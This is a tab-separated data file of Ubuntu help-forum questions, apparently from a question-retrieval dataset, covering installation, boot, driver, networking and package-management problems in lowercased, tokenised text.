445290	i cant install libraries	i typed in : apt-get install git-core libqt4-dev and i got an error saying : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? there is a $ when ever i type a command , so that means i 'm root right ?
445294	wrt54gl does n't work after upgrade fimware	-1 down vote favorite my wireless router ( wrt54gl v.1.1 ) can not work anymore , after i did upgrade the firmware . after i upgrade the firmware back to the beginning ( fw_wrt54gl_4.30.13.016_us_en_code ) using tftp.exe , basic router setup still can not show in a web browser . could any body help me , what to do ?
445296	a scenario which depict vsftpd	i downloaded vsftpd , install and config based on this link how to set up an ftp server in ubuntu linux on my ubuntu 12.04 . but the question is how to test that ? i want to learn how to use vsftpd and i am looking for an easy graphical step by step scenario to learn that . like a scenario which include client and server by using virtual box ? how to download a file from ubuntu_2 in ubuntu_1 . which both are virtual os in virtual box
445298	new samsung ativ 9 ultrabook ; deleting windows 8.1 and installing ubuntu	i understand from reading other threads that there are some complications with adding ubuntu to a computer that came with windows 8.1 pre-installed . i have n't used any of the linux distros before . i 've read through the solutions but i 'm wondering if there are any major disadvantages to completely uninstalling/deleting windows 8.1 and solely operating with ubuntu ( as opposed to the dual-boot option ) ? are there any complications that i would run in to ? furthermore , does ubuntu support all the hardware and features that might be found in a new ultrabook ( ie . touchscreen , 16gb ram , gpu acceleration , etc. ) . i would imagine some of that is dependent on the manufacturer of the book ; in this case , samsung . i do n't game like i used to so the primary function for the book is inet browsing , streaming video , media , and building upon my understanding of the open source os as a hobby . let me know what you think . thanks , ryan
445300	ubuntu installation with disk partition	i am new to ubuntu , so please guide me on how the partition of a 500 gb hdd has to be made . if i go to the two partitions , then ask no root file mounted , then the installation does not continue . please tell me how the partition is carried out at the time of installation . how i give the static ip to the pc how i find my disk partition in the pc
445304	ubuntu server 12.4 lts installation -boot error	i have just installed ubuntu 12.4 server but it doesnt boot i downloaded the iso that corresponds to my server ( amd x64 ) and i made a usb device bootable using the universal usb installer as http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows suggests . the installation went perfectly but after rebooting my computer without the usb device a black screen appears with the next message : reboot and select proper boot device or insert boot media in selected boot device and press a key and i ca n't get out of there ! i have read many posts all over the internet with a similar problem and i have tried many things such as reinstalling ubuntu ( kinda obvious ) redownloading and re-copying to the usb and reinstalling ( or at least i tried ) again but i ca n't get the problem solved . please help
445306	stuck at logo screen while booting on vmware workstation	i install ubuntu 12.0.4 on vmware workstation 9 . the installation is successful . i can log in to my account and i can install many packages and i can surf the website but when i shutdown and open ubuntu again . i stuck at the ubuntu logo screen . i try to reinstall but the problem still be there . here the screenshot : when i recreate ubuntu again , the problem is still occurred . how do i fix it ? the os of my pc is windows 7-64bit
445307	firefox crash bus error ( core dumped )	i am quite sure it has to do with the last security update i have installed ( today 9 apr 2014 ) . i have ubuntu 13.10 . firefox crashes after 5 seconds i launch the application . it does n't matter what i do , after some time it crashes . that 's what i get from the console : $ firefox -safe-mode ( process:9908 ) : glib-critical ** : g_slice_set_config : assertion 'sys_page_size == 0 ' failed ( firefox:9908 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :sm-connect after class was initialised ( firefox:9908 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :show-crash-dialog after class was initialised ( firefox:9908 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :display after class was initialised ( firefox:9908 ) : glib-gobject-warning ** : attempt to add property gnomeprogram : :default-icon after class was initialised bus error ( core dumped ) i moved the .mozilla/firefox folder , i even reinstalled , but the beheaviour is the same . ( kind of breaks right after receiving the request from the server , but sometimes i can see google for a couple of seconds before it breaks ) what should i do to have firefox running again ? or is firefox over for me ? : ( ( btw , it was n't immadiate , maybe because i had the browsers open when i accept the security update that i think is the guilty of everything , but it asks me to update adobe flash plugin to watch youtube -even though i have no problem at watching videos- , when there is no package like that in the ubuntu software center )
445309	âunable to find a medium containing a live file systemâ with ssd	after selecting install ubuntu from booting from a usb key it shows the loading ubuntu screen for about 30 seconds then gives the error initramfs `` unable to find a medium containing a live file system '' on a lenovo twist laptop . what is unique about my error is that ubuntu was installed and running fine on a partition of the my 500 gb hard drive . i had an ssd 24gb cache . i replaced my normal hd with an ssd and installed windows 8 on it . i then formatted the cache with fat32 planning on putting ubuntu on that 24gb . but now i ca n't boot from the same usb i used before with linux . my boot order is usb hd , ssd hard drive , then cache . i have checked the md5 , used multiple tools to make the boot key , made sure i 'm booting with ahci , tried all usb ports , disabled usb 3.0 , and tried everything from this bug report : https : //bugs.launchpad.net/ubuntu/+source/casper/+bug/1241589 also when i type `` blkid '' from the initramfs it does not show my usb key . so i 'm unable to boot from a linux live usb key after changing my harddrive . this question is asked before , but this is different than the others because it 's unique to a ssd and the `` solutions '' to others do not work in this case . there are lots of causes of this error where when installing you get a `` unable to find a medium containing a live file system '' but none of the solutions work and i believe this is unique to replacing my hd with an ssd .
445313	new asus 1015e-ds02 with ubuntu 12.04lts causes wifi signal loss on wrt54gl	some background info first : i have used a macbook for the past 6 years . it 's finally failing , so i purchased an asus 1015e-ds02 preloaded with ubuntu 12.04 lts . i am new to linux . my cable internet provider is time warner . my modem is a motorola surfboard sb5101u . my wireless router is a linksys wrt54gl v1.1 with stock firmware 4.30.14 . both my router and modem were purchased `` used '' on ebay about 18 months ago . in addition to the new asus laptop , i have 7 other wireless devices that had been functioning without problems on my network . and now the problem : within a couple hours of setting up the new laptop on my network , i began experiencing losses of wifi signal - my new laptop would display a message saying `` wifi disconnected '' , then the laptop would show a `` searching for network '' indicator . other devices on the network would display a similar `` ca n't connect to wireless network '' message . within 1 minute , all wifi connections would re-connect . this repeats . via telephone conversation with time warner , the rep said my signal strength was low , so they sent a field tech out to fix it . the tech came and removed an excess splitter he found in my cable wiring and said that he fixed the signal strength problem . however , he stated that he was sure that my problem lies not with my signal strength , but with my router . he proved this by cutting power to the modem and my problem did n't replicate . he stated that my router is the only component that could cause the `` wifi signal lost '' messages on my devices . he stated that my router likely needs to be replaced . the wifi signal loss problem persists . it seems very coincidental that the signal loss occurred with the addition of the new device , but i do n't know how to explain the relationship . interestingly , i turned my asus laptop off this morning and the wifi signal drops have ceased . once i fired up the asus machine , the signal drops returned . before i throw money into a new router , i want to identify the specific problem so i do n't throw money into the wrong solution . what additional info can i provide to help identify my problem ? thanks for reading !
445314	13.10 hyper-v scsi controller	i 've got ubuntu 13.10 server installed and running fine as a hyper-v guest on server 2012 , it can see the `` ide '' disks but it ca n't see anything attached to the scsi controller . i 'm aware of the limitations of not being able to boot from the scsi controller , however i want to add more than 3 extra physical disks to this system , which means i 've run out of `` ide '' ports , and they have to be connected via the hyper-v guest 's scsi controller . does anyone know if there 's a way to get ubuntu to recognise the disk if it 's set as a scsi disk instead of ide in the hyper-v host settings ?
445318	how can i install monodevelop v3 on 12.04 ?	i 'm trying to install monodevelop v4 on ubuntu 12.04 , so that i can install monogame v3.x . when installing from the software centre version 2.8.6.3 is installed . i followed the option 1 solution in damien 's answser here , but got the following error code when running ./configure configure : error : package requirements ( mono-addins-setup > = 0.4 ) were not met : no package 'mono-addins-setup ' found consider adjusting the pkg_config_path environment variable if you installed software > in a non-standard prefix . alternatively , you may set the environment variables mono_addins_setup_cflags and > mono_addins_setup_libs to avoid the need to call pkg-config . see the pkg-config man > page for more details . does anyone know where i 'm going wrong ? or have another solution i could try ? thanks
445319	do i go for lts or not ?	i donât know which version to use ! i 'm currently running 13.10 and have heard that new versions are coming out this month . my computing needs are simple and i have an older hp laptop . do i go for the lts release ? i do n't really want the bother of doing a huge download and install every 6 months . so , what are the advantages/disadvantages of using the lts version ? thanks .
445320	errors after installing uefi ubuntu 12.04 dual boot with windows 8 64-bit	this is a possible duplicate question , but i wanted to ask for more opinions to proceed further , because i am not exactly a linux-guru , just an average user . i have a new asus x550la notebook with windows 8 64-bit preinstalled on it . so , i have read several instructions via askubuntu to get myself acquainted with the topic of installing ubuntu on a dual boot basis . after that i proceeded to do following - used windows 8 control panel feature called `` windows 7 backup '' and created backup image of my partitions and c : drive - just in case i would mess things , stored backups away , downloaded ubuntu dvd x64 version , burned it , restarted into uefi advanced settings and disabled secureboot and fastboot options there , restarted again and chose uefi device dvd disk , installed ubuntu in uefi mode , fixed uefi part with boot-repair to re-enable windows 8 . result - everything works : i can load into both windows 8 and ubuntu 12.04 now . however , there are several things which i do n't like : 1 ) before grub menu shows up there are 3 lines with `` error efidisk error '' i followed some guides around , but was n't able to solve that problem . i 'd like to know how to remove these messages . 2 ) i have too many entries in grub menu - linux , another linux , memtest record ( which does n't work ) , standard windows record ( which also does n't work ) , two windows 8 records both of each work and load my windows ( why are ther two ? ) i would like to remove the entries , which do not work , and leave only two options - ubuntu and windows . problem here is that i can not find a guide for grub , which is uefi grub , and how to edit menu entries in such a case . i want to be sure , because if i follow a normal instruction and uefi adds problems it can possible mess up everything . 3 ) when loading ubuntu i for some reason get a message about `` can not write bytes pipe broken '' , screen becomes grey for several seconds , then proceeds to show normal ubuntu screens . i would like to fix that . it is possible that it happens due to my actions - i was looking at wrong model specifications and thought i had nvidia graphic card , so i was trying to install driver for it , but my graphic card is actually intel . in the end i purged everything nvidia-* and completely reconfigure xorg . can anyone give me instructions on how to completely reinstall and reconfigure xorg for my intel card ? i did n't notice any other problems so far , and everything else seems to work ok . i would like to ask people who have dealt with these problems , especially uefi , on how to resolve them . also , another question - should i re-enable secureboot or fastboot options in uefi/bios ? thanks in advance !
445321	i have recently installed 13.10 . i 'm getting a problem when i use sudo apt-get update	this is what i 'm getting when i 'm using sudo apt-get updates e : type 'download ' is not known on line 61 in source list /etc/apt/sources.list e : malformed line 3 in source list /etc/apt/sources.list.d/canonical_partner.list ( uri ) e : the list of sources could not be read .
445325	trying out ubuntu as an alternative to windows xp	i have read about how to try it ( on usb drive ) before installing , so that 's ok. my questions are : will my emails ( on outlook express ) transfer over ? can i keep old emails ? will my files and folders automatically transfer over ? what about my programs ? eg . adobe photoshop 7 , corel draw , and microsoft digital image pro 9 ? or should i just download ubuntu to usb , and try it ? i have an older dell optiplex 745 sff with 3.4ghz intel pentium d dual-core , 3gb ddr2 sdram and a 500 gb hard drive . do n't let the above fool you - i am not really computer literate . could i have answers in plain language , please ? !
445326	can not connect to internet in vmware workstation 10.0 - ubuntu 12.04	i have ubuntu 12.04 server installed in vmware workstation 10.0 on host windows 8.1 /etc/network/interfaces configuration is as follows . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.171.132 netmask 255.255.255.0 gateway 192.168.171.1 and network adapter is set to custom : vmnet 8 ( nat ) from windows , my host , i can see that vmnet 8 has ipv4 : 192.168.171.1 that should be the gateway in /etc/network/interfaces and that is . if i set it to dhcp , i can connect to internet from vm and get assigned an ip of 192.168.171.131 but the problem is that i can not connect to internet when i set it static . please tell me where i am getting wrong ?
445329	dependencies problem with x2go	i need help with my ubuntu server 12.04 64-bit . i ca n't update ubuntu , because i always have problems with x2go . see message below : dependency problems prevent configuration of openssh-server : openssh-server depends on openssh-client ( = 1:5.9 p1-5ubuntu1.2 ) ; however : version openssh-client 1:5.9 p1-5ubuntu1.3 is installed . dpkg : error processing openssh-server ( - configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of x2goserver : x2goserver depends on openssh-server ; however : the openssh-server package is not configured yet . dpkg : error processing x2goserver ( - configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of x2goserver-extensions : x2goserver x2goserver-dependent extensions ( > ~ 842 = ~ 4.0.1.14-0 ubuntu12.04.1 ) ; however : x2goserver the package is not configured yet . x2goserver x2goserver-dependent extensions ( < < 4.0.1.14-0 ubuntu12.04.1.1 ~ ~ ~ 842 ) i think there may be a conflict between the new and old version of x2go .
445330	error while removing crossplatformui package	whenever i try to install an application , i get the crossplatformui error . i tried to remove it but got the following response from terminal . please let me know how i can solve it . sahana @ sahana-inspiron-n5010 : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : crossplatformui 0 upgraded , 0 newly installed , 1 to remove and 1 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 169569 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sahana @ sahana-inspiron-n5010 : ~ $
445332	how can i handle more than 2 gb ram ?	i got a lenovo g475 laptop , with a amd e-300 processor . according to what i have read , the processor can handle up to 8gb and same the motherboard . when i was using windows 7 starter i could handle a maximum of 2gb because the operation system could only handle that , but here in ubuntu 12.1 ( ? ) read some about that , and tried the sudo dmidecode -t 16 , and it told me that i could only handle 2gb . how can i handle more ram ? i 'm new to ubuntu . i would like to know if the problem is in the motherboard , processor , the system or the bios .
445334	installing guest additions for ubuntu running in virtualbox on ubuntu	i installed ubuntu in virtual box that runs on ubuntu . how can i install the guest additions ? from my experience with virtual box i know that after installing guest additions i will be able to run the virtual box os in the full screen mode .
445335	how to setup mirror cdn servers	i know how to setup a single cdn server by using a cookieless subdomain . let 's say the static content is http : //subdomain.domain.com/js/jquery.js . when the user is closer to na , it should load the content from na servers and when the user is closer to eu , it should load the content from eu . my setup : i have shared hosting in na and eu , operated by the awesome ubuntu os . question : how do i setup multiple mirroring servers spread across the globe ? note : i do n't want to use any third party cdn services .
445336	how to package qml extension library + tabbed touch ui ?	i have followed the method described [ here ] ( https : //bugs.launchpad.net/ubuntu/+source/qtcreator/+bug/1215913 ) for creating qml extension library + tabbed touch ui project and generate click package . but the generated click package does n't approved in ubuntu software store for following reasons '' desktop_exec ( dudeescape ) '' : { '' link '' : `` what does desktop_exec mean ? `` , '' text '' : `` absolute path '/usr/bin/qmlscene -i backend/modules app/dudeescape.qml ' for exec given in .desktop file . '' } , '' desktop_icon ( dudeescape ) '' : { '' link '' : `` what does desktop_icon mean ? `` , '' text '' : `` ' @ icon @ ' specified as icon in .desktop file for app 'dudeescape ' , which is not available in the click package . '' }
445340	patch openssl cve-2014-0160 on ubuntu 12.04 ?	no , this is not a duplicate of how to patch the heartbleed bug ( cve-2014-0160 ) in openssl ? . so , read on . i am seeing conflicting information with respect to ubuntu 12.04 : the heartbleed page claims ubuntu 12.04 to be affected and needs to be patched with 1.0.1g the ubuntu security notice usn-2165-1 claims that version 1.0.1-4ubuntu5.12 for the package libssl1.0.0 should fix the issue on ubuntu 12.04 . now i do have these packages installed : # dpkg -l | grep ssl ii libssl1.0.0 1.0.1-4ubuntu5.10 ssl shared libraries ii openssl 1.0.1-4ubuntu5.10 secure socket layer ( ssl ) binary and related cryptographic tools # lsb_release -a | grep -i description description : ubuntu 12.04.3 lts so , if i consider above two points , i am not sure which one is true . besides , this heartbleed test page says that my machine is vulnerable . has anyone yet been able to fix this issue successfully on ubuntu 12.04 ? if yes , then could you provide me the steps you have taken ?
445342	dash home will not open	i am a first-time linux user who has installed ubuntu 12.04 on a dell dimension e510 that used to run windows xp . i can not get dash home to open . the other apps open : firefox , libre office , etc. , but when i click dash home the screen flickers a couple of times and no dash opens . no window with search bar and whatever else is supposed to be there . i have tried several of the suggestions in this forum , but nothing has helped . i have also reinstalled ubuntu from the boot disk , but dash still will not open . does anyone have a solution that can be communicated clearly ? i will not understand much linux terminology .
445348	openstack api-paste.ini configuration internal server error	i tried installing openstack on ubuntu 12.04 lts on vmware workstation . i followed the doc available on openstack website . i am getting neutron server error . it says error : unable to load quantum from configuration file /etc/neutron/api-paste.ini
445349	how do i get smem to output useful results ?	i recently installed smem on my ubuntu server with : $ sudo apt-get install smem it was installed correctly without errors . but when i launch it i do n't get any useful information about my processes ... $ smem pid user command swap uss pss rss just the column names . what am i doing wrong ? edit : i have ubuntu 12.04.4 lts .
445355	dual install problems	i realize this question has been asked by others but i ca n't seem to find a fix to my problem . i had ubuntu 13.10 dual-installed with windows 8 . everything was working perfectly , until i accepted the update to windows 8.1 . now i ca n't boot into ubuntu unless i reboot from the disk . i know ubuntu is still installed because all of my personal settings and programs are still in place . but i want to have the option of which os to boot at startup like i used to . ( is this the `` grub '' menu ? ) i 've tried many suggestions with no success . let me clarify , i 'm new to programming/etc . frankly , the answer i need may have already been posted but i just do n't understand it . who knows . i initially installed according to the instructions here : http : //www.everydaylinuxuser.com/2013/09/install-ubuntu-linux-alongside-windows.html when repair suggestions did n't work i tried re-entering the terminal commands at the end of the instructions at the above website . after re-entering those commands , boot repair gave me the following : http : //paste.ubuntu.com/7225235/ the boot files of [ the os now in use - ubuntu 13.10 ] are far from the start of the disk . your bios may not detect them . you may want to retry after creating a /boot partition ( ext4 , > 200mb , start of the disk ) . this can be performed via tools such as gparted . then select this partition via the [ separate /boot partition : ] option of [ boot repair ] . ( https : //help.ubuntu .com/community/bootpartition ) you may want to retry after deactivating the [ backup and rename windows efi files ] option . hopefully , this is enough information for someone out there to know what 's going on and give me a solution . thank you in advance for any and all assistance in this matter . please keep in mind , as i said , i 'm learning but i 'm still new to the whole programming world so try to give me a break on the jargon if you can . granted i can do more research to understand if necessary . thanks again .
445356	multiple button clicked signals emitted for a single click	writing a cut/copy/paste feature for a simple filebrowser in gtk . every cut/copy button/paste click emits a progressively higher number of signals . here is the part of the program that deals with the cut/copy/paste funtionality of the browser : def __init__ ( self ) : ' '' some code ' '' iconview1.connect ( `` selection-changed '' , self.on_selection_changed_1 , copybutton1 , copybutton2 , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , deletebutton1 , store1 , store2 ) iconview2.connect ( `` selection-changed '' , self.on_selection_changed_2 , copybutton1 , copybutton2 , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , deletebutton2 , store1 , store2 ) def on_selection_changed_1 ( self , iconview1 , copybutton1 , copybutton2 , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , deletebutton1 , store1 , store2 ) : selectedicon = iconview1.get_selected_items ( ) if selectedicon : model = iconview1.get_model ( ) path = model [ selectedicon [ 0 ] ] [ col_path ] self.action_directory_1 = self.current_directory_1+os.path.sep+path copybutton1.set_sensitive ( true ) cutbutton1.set_sensitive ( true ) deletebutton1.set_sensitive ( true ) copybutton1.connect ( `` clicked '' , self.copy_pressed , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , 1 , store1 , store2 ) cutbutton1.connect ( `` clicked '' , self.cut_pressed , copybutton1 , copybutton2 , pastebutton1 , pastebutton2 , 1 , store1 , store2 ) deletebutton1.connect ( `` clicked '' , self.delete_pressed , 1 , store1 , store2 ) else : copybutton1.set_sensitive ( false ) cutbutton1.set_sensitive ( false ) deletebutton1.set_sensitive ( false ) def on_selection_changed_2 ( self , iconview2 , copybutton1 , copybutton2 , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , deletebutton2 , store1 , store2 ) : selectedicon = iconview2.get_selected_items ( ) if selectedicon : model = iconview2.get_model ( ) path = model [ selectedicon [ 0 ] ] [ col_path ] self.action_directory_2 = self.current_directory_2+os.path.sep+path copybutton2.set_sensitive ( true ) cutbutton2.set_sensitive ( true ) pastebutton2.set_sensitive ( true ) deletebutton2.set_sensitive ( true ) copybutton2.connect ( `` clicked '' , self.copy_pressed , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , 2 , store1 , store2 ) cutbutton2.connect ( `` clicked '' , self.cut_pressed , copybutton1 , copybutton2 , pastebutton1 , pastebutton2 , 2 , store1 , store2 ) deletebutton2.connect ( `` clicked '' , self.delete_pressed , 2 , store1 , store2 ) else : copybutton2.set_sensitive ( false ) cutbutton2.set_sensitive ( false ) pastebutton2.set_sensitive ( false ) deletebutton2.set_sensitive ( false ) # # # # # # # # # # # # # # # action methods -- cut # # # # # # # # # # # # # # # # # def cut_pressed ( self , widget , copybutton1 , copybutton2 , pastebutton1 , pastebutton2 , index , store1 , store2 ) : if index == 1 : pastebutton2.set_sensitive ( true ) pastebutton2.connect ( `` clicked '' , self.paste_pressed , '' cut '' , 1 , store1 , store2 ) print `` cut button 1 '' print `` # # # # # # # # # # # # # # # # # # # # # # # # # # `` copybutton1.set_sensitive ( false ) widget.set_sensitive ( false ) else : pastebutton1.set_sensitive ( true ) pastebutton1.connect ( `` clicked '' , self.paste_pressed , '' cut '' , 2 , store1 , store2 ) print `` cut button 2 '' copybutton2.set_sensitive ( false ) widget.set_sensitive ( false ) # # # # # # # # # # # # # # # action methods -- copy # # # # # # # # # # # # # # # # # # def copy_pressed ( self , widget , cutbutton1 , cutbutton2 , pastebutton1 , pastebutton2 , index , store1 , store2 ) : if index == 1 : pastebutton2.set_sensitive ( true ) pastebutton2.connect ( `` clicked '' , self.paste_pressed , '' copy '' , 1 , store1 , store2 ) print `` copy button 1 '' cutbutton1.set_sensitive ( false ) widget.set_sensitive ( false ) else : pastebutton1.set_sensitive ( true ) pastebutton1.connect ( `` clicked '' , self.paste_pressed , '' copy '' , 2 , store1 , store2 ) print `` copy button 2 '' cutbutton2.set_sensitive ( false ) widget.set_sensitive ( false ) # # # # # # # # # # # # # # action methods -- paste # # # # # # # # # # # # # # # # def paste_pressed ( self , widget , action , index , store1 , store2 ) : if index == 1 : if action == `` cut '' : print `` cut selected 1 '' + `` action directory : `` +self.action_directory_1 print `` # # # # # # # # # # # # # # # # # # # # # # # # # # `` widget.set_sensitive ( false ) else : print `` copy selected 1 '' + `` action directory : `` +self.action_directory_1 print `` # # # # # # # # # # # # # # # # # # # # # # # # # # `` widget.set_sensitive ( false ) else : if action == `` cut '' : print `` cut selected 2 '' + `` action directory : `` +self.action_directory_1 print `` # # # # # # # # # # # # # # # # # # # # # # # # # # `` widget.set_sensitive ( false ) else : print `` copy selected 2 '' + `` action directory : `` +self.action_directory_1 print `` # # # # # # # # # # # # # # # # # # # # # # # # # # `` widget.set_sensitive ( false ) here is the output received in the terminal : vineet @ vineet : ~/documents/project $ python draft7.py cut button 1 // first click # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/efi # # # # # # # # # # # # # # # # # # # # # # # # # # cut button 1 // second click # # # # # # # # # # # # # # # # # # # # # # # # # # cut button 1 # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/media_file # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/media_file # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/media_file # # # # # # # # # # # # # # # # # # # # # # # # # # copy button 1 // third click copy button 1 copy button 1 cut selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # cut selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # copy selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # copy selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # copy selected 1 action directory : /media/vineet/mylinuxlive/pics # # # # # # # # # # # # # # # # # # # # # # # # # # as you can see in the terminal output each click after the first click emits an increasing no . of outputs than the one before.how do i obtain 1 emit signal per click ? ( or in this case one cut/copy button 1/2 ' and an associatedcut/copy selected 1/2` print output per click )
445357	xubuntu [ fresh install ] pushes my gpu to 129 deg celsius , 264 farenheit	i have an intel core2duo dell precision 390 , with some kind of nvidia graphics card - nothing special . while doing nothing , the gpu heats up to 129 degrees c , or 264 farenheit , over the course of the day . random pixels and artifacts appear as the gpu is stressed , the the system crashes . who can blame the poor thing ... results obtained from psensor . i though ubuntu had drivers taken care of , but obviously something is up . how do i go about installing correct drivers , once i 've identified the graphics card ?
445361	what is difference between /etc/shadow and /etc/passwd	i think both files /etc/shadow and /etc/passwd are same ? they just report some information about accounts.what is the difference betwwen them ?
445362	how can you get the number of the processes where program is started ?	first of all i save in a file all of the working processes . ps -el > file1 my idea is to count the number of lines in file1 where vi is present . i tryied something like wc -l | grep vi file1 how it\s the proper way to do it ?
445364	disable laptop monitor when there is an external monitor	how can i configure xorg so that when a certain external monitor is attached to my laptop via hdmi , that external monitor becomes the main monitor and the laptop monitor is switched off ? obviously i would like the laptop monitor to switch back on when the external monitor is unplugged . also , if possible , i would like to have this behaviour to occur only when a certain monitor is used .
445366	using kde 's dolphin file manager dual view the norton commander way ?	kde 's default file manager dolphin offers a possibility of a dual view . i would like to define keyboard shortcuts to easily switch between the left and right panes copy/move files between them but dolphin seems to offer nothing of that sort out of the box . has anybody had similar issues and figured a way to do that or around it ? maybe an alternative kde software ?
445368	how to auto restart services when you get security updates ?	that 's related to the heartbleed bug . while my server ( 12.04 lts ) was configured to perform unattended install of all security updates , it seems that nginx was not restarted so it was still affected by the bug . by manually performing the restart the problem was solved , but i am looking for an automatic solution to this kind of problem . note : i am using the nginx from nginx.org , not the one from ubuntu which is , ancient .
445372	how do i turn on v-sync for desktop ?	i 'm running 12.04 x64 with a geforce gtx650 . when i play games , i turn v-sync on to prevent screen tearing , and it works fine . but desktop is another problem : i ca n't get desktop ( most notably , the web browser ) to stop tearing the image . i turned `` sync to vblank '' on , but it did n't help . thanks in advance !
445373	nautilus 's 'open with ' list	in nautilus when i try to open a pdf with adobe reader , i can not find adobe reader in open with ... . in dolphin there 's not such problem . how can i add adobe reader link to `` open with ... '' list in nautilus ? i use nautilus in kde environment .
445375	switch from gui to the command line interface/console temporarily	i want to switch off the gui , and only leave the command line interface or it is also know as the cli . how would i do this ?
445376	workaround for printing with 32b canon drivers from ubuntu 64bits ?	i have installed 32bit ubuntu versions for years since i feared incompatibility issues , but last time i installed it , i went for a 64 bit as this is the default now , and everything worked smoothly until i started trying to print something . my printer is a canon ip4300 . canon has provided rpm drivers which i could try to install with alien , but those are 32bits only , and i searched a lot about this , and it appears that there is no way to have it work on a 64bit system , see for example this discussion . so since it seems that it is impossible to print from a 64 bits system to an ip4300 canon printer by the classic way ( ie installing appropriated drivers ) , i am looking for a clever workaround ( for example some alternative way to talk to the printer ) . any idea ?
445382	can not install ubuntu 12.04 , 12.10 , 13.04 and 13.10 in hp pavillion g7-1358dx a7a45ua	i am trying to install ubuntu into my laptop since some time ago using a different version of it i always stuck in the screen which is shown after the bios loads . i tried dual booting ubuntu with pre-installed windows 7 home premium 64 bit . i used a usb bootable pen drive for installing ubuntu but it stuck . the bios loads , then loading of ubuntu starts , then after a while , a black screens appears with flashes of ubuntu 's orange colour in the screen . i also tried installing ubuntu with the ubuntu installer for windows but it also stuck after the ubuntu loading screen . more information about my laptop at the hp web page .
445383	java wo n't run properly in chrome - icedtea	i installed openjdk 1.6 and 1.7 to my system , and icedtea for chrome . when i go to the jre detect page , after the icedtea screen , a grey box appears . i tried every way i could find in the internet , i could n't make it work . icedtea-web plugin ( using icedtea-web 1.4 ( 1.4-3ubuntu2.1 ) ) - version : 1.4 is activated in chrome : //plugins . created an icedteaplugin.so link in /usr/lib/chromium-browser/plugins ( created plugins directory myself ) . is there a way to identify the source of the problem ?
445384	what is the difference between apt and apt-get ?	i read about the new fancy progress bar which was added to apt 1.0 in softpedia and how to enable it here . however on running sudo apt-get update , i did not see the fancy progress bars . on reading the second link again , the solution explicitly requires you to use sudo apt update . hence my question is the difference between apt and apt-get . i thought they were one and the same .
445387	how do you open a terminal ?	i was given the advice to open a terminal & type in some commands to try & repair my computer but do n't know what a terminal is.can someone explain please ?
445388	when i want to install mkvtoolnix3.8.0 on 10.4 . i have some problem as followed:	dpkg-checkbuilddeps : unmet build dependencies : libboost-dev ( > = 1.46 ) | libboost1.48-dev libboost-filesystem-dev ( > = 1.46 ) | libboost-filesystem1.48-dev libboost-regex-dev ( > = 1.46 ) | libboost-regex1.48-dev libboost-system-dev ( > = 1.46 ) | libboost-system1.48-dev
445396	ca n't access grub by holding down shift ; ca n't access desktop due to errors . how do i fix this ?	i recently moved to australia , need to find work , but ca n't use my computer , and it 's really hindering me . i need your assistance please . i 'm getting an error , `` the system is running in low graphics mode '' : i hit `` ok , '' and a form comes up : what would you like to do ? [ x ] run in low graphics mode for just one session [ ] reconfigure graphics [ ] troubleshoot the error [ ] exit to console login no matter how i try , i ca n't get it to select the other options . so i hit okay and `` run in low graphics mode for just one session . '' and eventually , i get this : this is all fine because i found solutions i can try regarding low graphics mode in various posts , in which a few users mentioned pressing ctrl+alt+f1 to go to the terminal and login to my credentials , but i ca n't ... the terminal would look like this : seventen login : password : and i get stuck here . user jorbin , who helped me a lot , taught me that seventen is my computer name . but when i was able to boot up my computer normally , seventen is the account , other than guest , that i use . so i have no idea what to enter afterwards . i tried : seventen login : seventen password : xxxxxxx and i 'm sure that my account name and password is correct ( wth ) . so i can also try booting in recovery mode , but i ca n't access grub . i tried holding down shift and tapping shift repeatedly right before `` ubuntu '' comes up . i read in another post to try `` esc , '' `` tab , '' and `` alt , '' which i will try tonight , but i 'm at the library and decided to post here first to see if i can get any input .
445400	adding different sets of dns to -one- network adapter	my work environmental infrastructure depends on two different dns servers . one that is here locally with us and one that is remote , on another location ( which we have access to ) . the question is whether we can connect and set up different vlans ( to our client machines ) that refer to different sets of dns . in other words : our local one and remote one . are there any ways of doing this in ubuntu ? preferably 12.04 . we 've tried earlier doing this : create virtual network adapters in ubuntu 12.04 ( precise pangolin ) . edit : i also want to add in that these different dns servers are not members of the same domain .
